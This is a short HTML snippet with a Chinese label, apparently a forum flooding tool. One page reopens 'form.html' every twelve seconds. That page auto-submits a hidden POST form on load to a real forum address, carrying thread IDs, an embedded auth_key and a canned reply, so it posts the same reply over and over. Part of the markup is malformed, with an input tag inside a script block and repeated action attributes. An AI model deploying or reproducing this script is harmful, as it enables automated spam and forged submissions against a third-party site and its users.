<html>
<script language="javascript">
var newWin
function start()
{
newWin=window.open("form.html");
setInterval("openLink();",12001);
}
function openLink()
{
newWin.location="form.html";
}
</script>
<body onLoad="start();">
</body>
</html>
form.html的内容:
<html>
<body onLoad="FORM.submit();">
<form name=FORM action="http://0668.cc/index.php?" method=post enctype="application/x-www-form-urlencoded">
<INPUT TYPE="hidden" NAME="act" VALUE="Post">
<INPUT TYPE="hidden" NAME="CODE" VALUE="03">
<INPUT TYPE="hidden" NAME="f" VALUE="17">
<INPUT TYPE="hidden" NAME="t" VALUE="3529">
<INPUT TYPE="hidden" NAME="st" VALUE="108390">
<INPUT TYPE="hidden" NAME="enabletrack" VALUE="0">
<INPUT TYPE="hidden" NAME="auth_key" VALUE="b71b5085d8249c35c1d8760ce84af39b">
<TEXTAREA ROWS="5" COLS="3" NAME="Post" >我爱happy</TEXTAREA>
<script language="javascript">
<INPUT TYPE="submit" ACTION="http://0668.cc/index.php?" VALUE="回复" METHOD="post" NAME="submit"
ACTION="http://0668.cc/index.php?" METHOD=post
ACTION="http://0668.cc/index.php?" METHOD=post
ACTION="http://0668.cc/index.php?" METHOD=post
ACTION="http://0668.cc/index.php?" METHOD=post
ACTION="http://0668.cc/index.php?" METHOD=post
ACTION="http://0668.cc/index.php?" METHOD=post>
</script>
</body>
</html>